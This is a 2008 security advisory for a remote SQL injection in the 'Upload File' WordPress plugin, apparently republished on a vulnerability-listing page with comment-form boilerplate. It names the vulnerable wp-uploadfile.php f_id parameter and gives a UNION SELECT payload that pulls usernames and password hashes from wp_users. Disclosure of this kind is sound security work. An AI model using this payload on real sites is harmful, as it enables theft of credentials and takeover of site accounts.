vuln in WordPress plugin Upload File(UP)

2008.05.25

Credit: my_at_eserg.ru

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 New Advisory:
Wordpress Plugin Upload File(UP) Remote SQL Injection
--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: eserg.ru
-----------------Description---------------
1. SQL Injection.
http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
SQL query:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
--------------PoC/Exploit----------------------
Waiting for developer(s) reply.
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Regards,
Belsec Team
http://eserg.ru

References:

http://seclists.org/bugtraq/2008/May/0272.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

vuln in WordPress plugin Upload File(UP)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.